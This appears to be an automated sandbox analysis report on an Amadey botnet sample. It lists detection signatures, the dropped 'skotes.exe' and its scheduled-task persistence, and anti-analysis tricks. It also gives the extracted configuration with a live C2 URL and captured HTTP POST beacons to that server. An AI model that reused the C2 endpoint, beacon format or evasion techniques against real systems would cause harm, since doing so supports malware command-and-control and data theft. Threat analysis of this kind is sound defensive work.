Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559376
MD5:ebe6de9be122d27057536193303f1f89
SHA1:199b00d481006678f3a2db4902910a883be2f275
SHA256:bace923f8be90bf0f398e9310d52723265e250651cb36115bc233ca3300160a6
Tags:exeuser-Bitsight
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6760 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EBE6DE9BE122D27057536193303F1F89)
    • skotes.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: EBE6DE9BE122D27057536193303F1F89)
  • skotes.exe (PID: 1136 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EBE6DE9BE122D27057536193303F1F89)
  • skotes.exe (PID: 3612 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: EBE6DE9BE122D27057536193303F1F89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000000.00000003.1714685020.0000000005260000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000006.00000003.2310587300.00000000048D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000001.00000002.1786704967.0000000000E91000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000003.1743754527.0000000004A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.skotes.exe.e90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              1.2.skotes.exe.e90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                6.2.skotes.exe.e90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0.2.file.exe.f20000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-20T13:08:05.776431+010028561471A Network Trojan was detected192.168.2.449783185.215.113.4380TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://185.215.113.43/Zu7JuNko/index.php32Avira URL Cloud: Label: malware
                    Source: http://185.215.113.43/Zu7JuNko/index.phpdedOAvira URL Cloud: Label: malware
                    Source: http://185.215.113.43/Zu7JuNko/index.php#Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.43/Zu7JuNko/index.phpmAvira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: 00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                    Source: file.exeReversingLabs: Detection: 52%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49783 -> 185.215.113.43:80
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00E9BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00E9BE30
                    Source: unknownHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php#
                    Source: skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php32
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpH
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpX
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedO
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpm
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: skotes.exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00E9E5306_2_00E9E530
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ED78BB6_2_00ED78BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ED88606_2_00ED8860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ED70496_2_00ED7049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00E94DE06_2_00E94DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ED31A86_2_00ED31A8
